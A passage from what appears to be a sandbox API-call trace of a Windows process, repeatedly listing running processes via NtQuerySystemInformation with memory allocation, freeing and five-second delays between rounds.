BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.841] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 